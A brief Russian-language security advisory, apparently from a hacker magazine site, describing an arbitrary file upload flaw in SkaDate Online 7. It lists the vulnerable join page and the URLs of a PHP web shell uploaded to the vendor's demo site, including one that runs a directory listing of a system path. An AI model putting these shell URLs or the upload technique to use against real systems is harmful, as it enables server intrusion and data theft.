Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: SkaDate Online 7
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий
может загрузить произвольные файлы на целевую систему (например, шелл).
Эксплоит:
http://www.skadate.com/demo/member/join.php
Шелл:
http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php
http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases